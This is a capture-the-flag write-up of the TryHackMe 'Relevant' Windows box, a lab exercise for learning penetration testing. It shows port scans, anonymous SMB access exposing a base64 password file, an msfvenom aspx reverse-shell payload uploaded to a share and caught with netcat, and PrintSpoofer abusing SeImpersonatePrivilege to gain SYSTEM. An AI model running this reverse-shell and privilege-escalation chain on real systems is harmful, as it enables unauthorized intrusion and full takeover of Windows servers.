Relevant
Overview
Scope of work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
- User.txt
- Root.txt
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
- Find and report ALL vulnerabilities (yes, there is more than one path to root)
Recon
1$ sudo nmap -A -sS -sV -T4 -oN relevant-nmap.txt 10.10.211.121
2Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-03 16:10 EDT
3Nmap scan report for 10.10.211.121
4Host is up (0.088s latency).
5Not shown: 995 filtered ports
6PORT STATE SERVICE VERSION
780/tcp open http Microsoft IIS httpd 10.0
8| http-methods:
9|_ Potentially risky methods: TRACE
10|_http-server-header: Microsoft-IIS/10.0
11|_http-title: IIS Windows Server
12135/tcp open msrpc Microsoft Windows RPC
13139/tcp open netbios-ssn Microsoft Windows netbios-ssn
14445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
153389/tcp open ms-wbt-server Microsoft Terminal Services
16| rdp-ntlm-info:
17| Target_Name: RELEVANT
18| NetBIOS_Domain_Name: RELEVANT
19| NetBIOS_Computer_Name: RELEVANT
20| DNS_Domain_Name: Relevant
21| DNS_Computer_Name: Relevant
22| Product_Version: 10.0.14393
23|_ System_Time: 2020-10-03T20:10:58+00:00
24| ssl-cert: Subject: commonName=Relevant
25| Not valid before: 2020-07-24T23:16:08
26|_Not valid after: 2021-01-23T23:16:08
27|_ssl-date: 2020-10-03T20:11:39+00:00; +1s from scanner time.
28Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
29Device type: general purpose
30Running (JUST GUESSING): Microsoft Windows 2012|2016 (92%)
31OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
32Aggressive OS guesses: Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2016 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%)
33No exact OS matches for host (test conditions non-ideal).
34Network Distance: 4 hops
35Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
36
37Host script results:
38|_clock-skew: mean: 1h24m01s, deviation: 3h07m50s, median: 1s
39| smb-os-discovery:
40| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
41| Computer name: Relevant
42| NetBIOS computer name: RELEVANT\x00
43| Workgroup: WORKGROUP\x00
44|_ System time: 2020-10-03T13:11:00-07:00
45| smb-security-mode:
46| account_used: guest
47| authentication_level: user
48| challenge_response: supported
49|_ message_signing: disabled (dangerous, but default)
50| smb2-security-mode:
51| 2.02:
52|_ Message signing enabled but not required
53| smb2-time:
54| date: 2020-10-03T20:11:01
55|_ start_date: 2020-10-03T19:59:51
56
57TRACEROUTE (using port 135/tcp)
58HOP RTT ADDRESS
591 12.78 ms 10.6.0.1
602 ... 3
614 98.42 ms 10.10.211.121
62
63OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
64Nmap done: 1 IP address (1 host up) scanned in 65.70 seconds
Highlights:
- IIS web server running on port 80
- 139,445 indicate that there is SMB service running and we can possibly exploit it (Note: message_signing: disabled (dangerous, but default) )
- Likely, the operating system running is - Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2016 (90%)
- IIS default website on port 80
- 3389/tcp open ms-wbt-server Microsoft Terminal Services (RDP - Remote desktop definitely seems very interesting)
- OSScan indicates there are possibly more open ports that nmap was not able to find.
Lets kick off threader3000 port scanner to do a full scan of all the ports on the machine while we proceed with next steps.
1------------------------------------------------------------
2 Threader 3000 - Multi-threaded Port Scanner
3 Version 1.0.6
4 A project by The Mayor
5------------------------------------------------------------
6Enter your target IP address or URL here: 10.10.35.26
7------------------------------------------------------------
8Scanning target 10.10.35.26
9Time started: 2020-10-06 21:31:44.429348
10------------------------------------------------------------
11Port 139 is open
12Port 135 is open
13Port 80 is open
14Port 445 is open
15Port 3389 is open
16Port 49668 is open
17Port 49663 is open
18Port 49666 is open
19Port scan completed in 0:01:39.226581
20------------------------------------------------------------
21
This scan comes back with ports 49663/6/8, lets enumerate further in the next steps.
1nmap -p139,135,80,445,3389,49668,49663,49666 -sV -sC -Pn -T4 10.10.199.210
2Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-06 22:20 EDT
3Nmap scan report for 10.10.199.210
4Host is up (0.081s latency).
5
6PORT STATE SERVICE VERSION
780/tcp open http Microsoft IIS httpd 10.0
8| http-methods:
9|_ Potentially risky methods: TRACE
10|_http-server-header: Microsoft-IIS/10.0
11|_http-title: IIS Windows Server
12135/tcp open msrpc Microsoft Windows RPC
13139/tcp open netbios-ssn Microsoft Windows netbios-ssn
14445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
153389/tcp open ms-wbt-server Microsoft Terminal Services
16| rdp-ntlm-info:
17| Target_Name: RELEVANT
18| NetBIOS_Domain_Name: RELEVANT
19| NetBIOS_Computer_Name: RELEVANT
20| DNS_Domain_Name: Relevant
21| DNS_Computer_Name: Relevant
22| Product_Version: 10.0.14393
23|_ System_Time: 2020-10-07T02:21:10+00:00
24| ssl-cert: Subject: commonName=Relevant
25| Not valid before: 2020-07-24T23:16:08
26|_Not valid after: 2021-01-23T23:16:08
27|_ssl-date: 2020-10-07T02:21:45+00:00; 0s from scanner time.
2849663/tcp open http Microsoft IIS httpd 10.0
29| http-methods:
30|_ Potentially risky methods: TRACE
31|_http-server-header: Microsoft-IIS/10.0
32|_http-title: IIS Windows Server
3349666/tcp open msrpc Microsoft Windows RPC
3449668/tcp open msrpc Microsoft Windows RPC
35Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
36
37Host script results:
38|_clock-skew: mean: 1h24m01s, deviation: 3h07m52s, median: 0s
39| smb-os-discovery:
40| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
41| Computer name: Relevant
42| NetBIOS computer name: RELEVANT\x00
43| Workgroup: WORKGROUP\x00
44|_ System time: 2020-10-06T19:21:10-07:00
45| smb-security-mode:
46| account_used: guest
47| authentication_level: user
48| challenge_response: supported
49|_ message_signing: disabled (dangerous, but default)
50| smb2-security-mode:
51| 2.02:
52|_ Message signing enabled but not required
53| smb2-time:
54| date: 2020-10-07T02:21:09
55|_ start_date: 2020-10-07T02:06:09
56
57Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
58Nmap done: 1 IP address (1 host up) scanned in 96.86 seconds
59
Looks like we have another web service running using Microsoft IIS httpd 10.0. We need to kick off directory search tools to figure out possible directories that may be exposed. The landing pages for this port and 80 are the default IIS landing pages. Need to dig deeper.
Enumeration
Kicked off gobuster in the background to enumerate paths.
1# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.35.26:49666
2
3
4
$ smbclient //10.10.211.121/nt4wrksv Enter WORKGROUP's password: Try “help” to get a list of possible commands. smb: > ls . D 0 Sat Jul 25 17:46:04 2020 .. D 0 Sat Jul 25 17:46:04 2020 passwords.txt A 98 Sat Jul 25 11:15:33 2020
7735807 blocks of size 4096. 5136451 blocks available
smb: > get passwords.txt getting file \passwords.txt of size 98 as passwords.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
$ cat passwords.txt [User Passwords - Encoded] Qm9XXXXXXXXXXXXXXXXXXXXXXXXX QmlXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
These strings look like base64 encoded, decode with base64 -d command
$ echo -n Qm9XXXXXXXXXXXXXXXXXXXXX | base64 -d BXXXXXXXXXXXXXXXXXX3
And
$ echo -n QmlXXXXXXXXXXXXXXXXXXXXX | base64 -d BXXXXXXXXXXXXXXXXX$
Now, we have username and passwords to try and connect to the system.
Exploit
Use the awesome venom builder tool on pentest.ws to quickly come up with a command to generate an aspx reverse shell. See this link for pentesting tools.
1# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.19.215 LPORT=8000 -f aspx -o shell.aspx
Copy the payload over to the samba share.
1# smbclient \\\\10.10.94.15\\nt4wrksv -U Bob
2^C
3root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/relevant/data# smbclient \\\\10.10.189.189\\nt4wrksv -U Bob
4Enter WORKGROUP\Bob's password:
5Try "help" to get a list of possible commands.
6smb: \> put shell.aspx
7putting file shell.aspx as \shell.aspx (14.4 kb/s) (average 14.4 kb/s)
8smb: \> ls
9 . D 0 Sun Oct 4 13:05:44 2020
10 .. D 0 Sun Oct 4 13:05:44 2020
11 passwords.txt A 98 Sat Jul 25 11:15:33 2020
12 shell.aspx A 3661 Sun Oct 4 13:05:44 2020
13
14 7735807 blocks of size 4096. 5136965 blocks available
15smb: \>
Post-Exploitation/Privesc
I also tried uploading the aspx webshell. It was fun to capture the user flag from the webshell.
We also have our regular shell -
1# nc -nvlp 8000
2listening on [any] 8000 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.199.210] 49945
4Microsoft Windows [Version 10.0.14393]
5(c) 2016 Microsoft Corporation. All rights reserved.
6
7c:\windows\system32\inetsrv>whoami
8whoami
9iis apppool\defaultapppool
10c:\windows\system32\inetsrv>whoami /priv
11whoami /priv
12
13PRIVILEGES INFORMATION
14----------------------
15
16Privilege Name Description State
17============================= ========================================= ========
18SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
19SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
20SeAuditPrivilege Generate security audits Disabled
21SeChangeNotifyPrivilege Bypass traverse checking Enabled
22SeImpersonatePrivilege Impersonate a client after authentication Enabled
23SeCreateGlobalPrivilege Create global objects Enabled
24SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
25
26c:\windows\system32\inetsrv>
27
From experience and reading around windows privesc, i knew that SeImpersonatePrivilege is a juicy target that can be easily exploited but I was stuck here for quite some time until I followed the Mayor’s video on this box. Also, learnt about a new privesc utility - https://github.com/itm4n/PrintSpoofer.
Uploaded the 64bit version and ran it from the previously obtained shell, the rest was easy.
1c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
2PrintSpoofer.exe -i -c cmd
3'PrintSpoofer.exe' is not recognized as an internal or external command,
4operable program or batch file.
5
6c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c cmd
7PrintSpoofer64.exe -i -c cmd
8[+] Found privilege: SeImpersonatePrivilege
9[+] Named pipe listening...
10[+] CreateProcessAsUser() OK
11Microsoft Windows [Version 10.0.14393]
12(c) 2016 Microsoft Corporation. All rights reserved.
13
14C:\Windows\system32>whoami
15whoami
16nt authority\system
17
18C:\Windows\system32>cd c:\Users\Administrator\Desktop
19cd c:\Users\Administrator\Desktop
20
21c:\Users\Administrator\Desktop>dir
22dir
23 Volume in drive C has no label.
24 Volume Serial Number is AC3C-5CB5
25
26 Directory of c:\Users\Administrator\Desktop
27
2807/25/2020 08:24 AM <DIR> .
2907/25/2020 08:24 AM <DIR> ..
3007/25/2020 08:25 AM 35 root.txt
31 1 File(s) 35 bytes
32 2 Dir(s) 20,279,513,088 bytes free
33
34c:\Users\Administrator\Desktop>type root.txt
35type root.txt
36THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
37c:\Users\Administrator\Desktop>
38
This is a great box and since there are several other ways to crack it, may be I will do a follow-up attempt to hack into this machine using a different method.